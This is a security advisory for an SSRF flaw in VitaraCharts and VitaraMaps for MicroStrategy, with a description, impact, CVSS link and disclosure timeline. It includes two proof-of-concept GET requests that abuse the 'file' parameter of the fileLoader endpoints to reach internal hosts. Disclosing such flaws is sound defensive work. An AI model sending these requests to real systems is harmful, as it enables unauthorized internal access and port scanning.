CVE-2025-57305 - Server-Side Request Forgery in VitaraCharts & VitaraMaps for MicroStrategy

Description #

VitaraCharts version 5.3.5 and VitaraMaps version 5.3 are vulnerable to Server-Side Request Forgery (SSRF) via the fileLoader.jsp and fileLoader.aspx endpoints, which allows attackers to issue arbitrary HTTP requests using the file query string parameter and read full responses.

Proof of Concept #

Java #

The following proof-of-concept demonstrates controlling the file parameter to obtain the response from an HTTP request to http://127.0.0.1 on port 9000:

GET /VitaraCharts/fileLoader.jsp?callback=vitaraJsonPFileOnLoad0&file=http://127.0.0.1:9000&ctx=defaultSVGs&vitaraJsonpFileOnLoad0=jQuery HTTP/1.1

.NET #

The following proof-of-concept demonstrates controlling the file parameter to obtain the response from an HTTP request to http://127.0.0.1 on port 9000:

GET /VitaraCharts/fileLoader.aspx?callback=test&file=https://127.0.0.1:9000&ctx=defaultSVGs&type=txt

Impact #

An attacker who can access the fileLoader.jsp endpoint may provide absolute URLs to arbitrary locations and gain unauthorized access to internal resources, effectively bypassing access controls. Additionally, SSRF allows an attacker to perform port scanning against internal hosts by comparing the HTTP response to URLs with differing ports.

Recommended CVSSv3.1: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N&version=3.1

Disclosure Timeline #

• June 12, 2025 - Vulnerability Discovery
• August 11, 2025 - Contacted Vendor
  • no response
• September 23, 2025 - CVE ID Reserved
• October 2, 2025 - Public Disclosure (current document)

References #

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-57305